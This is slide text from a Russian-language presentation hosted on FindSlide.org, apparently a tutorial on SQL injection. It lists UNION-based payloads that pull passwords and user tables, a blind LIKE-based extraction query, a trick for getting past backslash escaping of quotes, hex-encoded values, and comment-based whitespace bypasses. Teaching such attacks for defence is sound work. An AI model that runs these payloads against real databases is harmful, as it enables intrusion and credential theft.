FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.
Email: Нажмите что бы посмотреть
Простейшая уязвимость
How to UNION
$text = ' UNION SELECT pass FROM data WHERE id = 1 --
$text = ' UNION SELECT *,1 FROM data WHERE id = 1238 --
IF((SELECT username FROM users WHERE id = 1) LIKE 'qwer%', 1, 0)
'%' - неопределённое кол-во символов
'_' - один символ
SELECT id, CONCAT(username,' - ', pass) AS user_data
CONCAT('str1','str2',…,'strN') = 'str1str2...'
$text = \' UNION SELECT * FROM users; --
\ => \\
$text = \\' UNION SELECT * FROM users; --
SELECT * FROM users WHERE pass = 0x74657874
SELECT/**/*/**/FROM/**/users/**/WHERE/**/pass/**/=/**/0x74657874
/* - начало блока комментариев
*/ - конец блока комментариев
Real life example